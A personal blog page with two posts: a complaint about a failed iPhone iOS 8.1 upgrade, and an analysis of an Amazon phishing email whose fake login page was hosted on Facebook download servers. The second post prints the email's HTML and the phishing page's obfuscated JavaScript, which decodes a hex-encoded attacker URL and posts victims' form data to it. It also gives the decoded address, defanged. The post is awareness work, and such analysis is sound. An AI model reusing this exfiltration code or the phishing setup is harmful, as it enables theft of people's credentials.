A nightmare for an upgrade ....

Rédigé par genuix - 21 octobre 2014 13:23

What a nightmare juste for an upgrade ?!?!?!?!

Juste trying to upgrade my iPhone 6 to new realese 8.1 from apple taht they just made available to day...

My MacBookPro was on OS X Maverick and the hell started...

after downloading the new IOS it push it to the phone, till shis was ok and then it reboot on recovery mode and stay stuck in this state.

i tryed to restore it to see what will gonging on but after the reboot for the resoration it stuck again in recovery mode....

the only way to get it rebooted correctly was to close iTune and stay connected to the macbook and hold the home and start button.

then it came back to the basc state as out of the box and i hade to restore backup from icloud (hopefully i had it)

And the iPhone stay rebooting in recovery mode every  hours .......

If you try the upgrade without be fully certain that your icloud backup is configured correctly and a backup fresh then DON'T !!!

Be very carefull with it and my best advice is as usual wait at least 2 or 3 days before applying any upgrade.



Classé dans : Accueil - Mots clés : iPhone upgrade IOS 8.1 -

AmaZon Phishing hosted by Facebook Servers

Rédigé par genuix - 02 octobre 2014 14:38

Strange email fall in my mailbox yesterday,

Subject : Problem with your billing

From :

Hopefully i'm under Linux Working station an thunderbird didn't load automaticaly any link or attachement.....

None the less it's not everybody case, so ... (maybe sometime ...)

As usually i get a little look at the none loaded items and what get my attention was the URL, i dont' analyze all the spam or phishig email i get in my mailbox but some times it's interesting and i go further...

My point is to make pepoles aware and careful.

The email it self contain only an image loaded from the same source server as the phishing page (but on a different uri) :

image loaded iby the mail from FACEBOOK server

The danger here is that it's hosted in FACEBOOK® !!!!

Danger because FB is a "Safe place" to host as it's hight availaibility capability world wide.

The point here is that the page is not interpreted code nor executed script of any kind but downloaded by the user "Automaticly" in most of the case for the user conveinance, and shown in webrowser.

Here is the core of the email , only load image with href tag when image is clicked go download the html file from FACEBOOK® it self : 

Content-Type: text/plain;
Content-Transfer-Encoding: 7bit

they're here
< https [:] / / www[.]facebook[.]com / download / {FACEBOOK-USER-NUMBER} / PP_NNN_NNN_NNN_NNN[.]html >

Content-Type: text/html
Content-Transfer-Encoding: 7bit

<A href="https [:] / / www[.]facebook[.]com / download / {FACEBOOK-USER-NUMBER} / PP_002_054_171_429[.]html">
<IMG alt="they're here" src="https [:] / / www[.]facebook[.]com / download / {FACEBOOK-USER-NUMBER} / zonzon[.]jpg">

Then a well designed false Amazon page : " Amazon.com|Verification " From FACEBOOK® downloads servers

amazone fake sing in image

Then, When completed the form send formated query to an pirated web site located in Spain Interpreting dreams....

In the page source is a function that encode the final url where the information submited by the user (if any), are sent:

var symbols = " !\"#$%&'()*+,-./0123456789:;<=>?@";
var loAZ = "abcdefghijklmnopqrstuvwxyz";
symbols+= loAZ.toUpperCase();
symbols+= "[\\]^_`";
symbols+= loAZ;
symbols+= "{|}~";
	valueStr = "68:74:74:70:3a:2f:2f:65:6f:66:64:72:65:61:6d:73:2e:65:73:79:2e:65:73:2f:69:6e:64:65:78:5f:66:69:6c:65:73:2f:73:65:6e:64:32:2e:70:68:70";
	valueStr = valueStr.toLowerCase();
    var hex = "0123456789abcdef";
	var text = "";
	var i=0;

	for( i=0; i<valueStr.length; i=i+2 ){
		var char1 = valueStr.charAt(i);
		if ( char1 == ':' ){
			char1 = valueStr.charAt(i);
		var char2 = valueStr.charAt(i+1);
		var num1 = hex.indexOf(char1);
		var num2 = hex.indexOf(char2);
		var value = num1 << 4;
		value = value | num2;

		var valueInt = parseInt(value);
		var symbolIndex = valueInt - 32;
		var ch = '?';
		if ( symbolIndex >= 0 && value <= 126 ){
			ch = symbols.charAt(symbolIndex)
		text += ch;
$.post(text, $("#mycontactform").serialize(),  function(response) {
return false;

Decoded string give:
http[:] / / eofdreams[.]esy[.]es / index_files / send2[.]php


Video of the PoC made by Friends :

Even trying to shout at FaceBook and Amazon but still no Answer and Pages still online....

urlQuery result on the landing page where the infos of the user are sent after form is completed :



Classé dans : Accueil, Scam - Mots clés : amazon facebook malwaremustdie malware phishing -



Mots clés

Derniers articles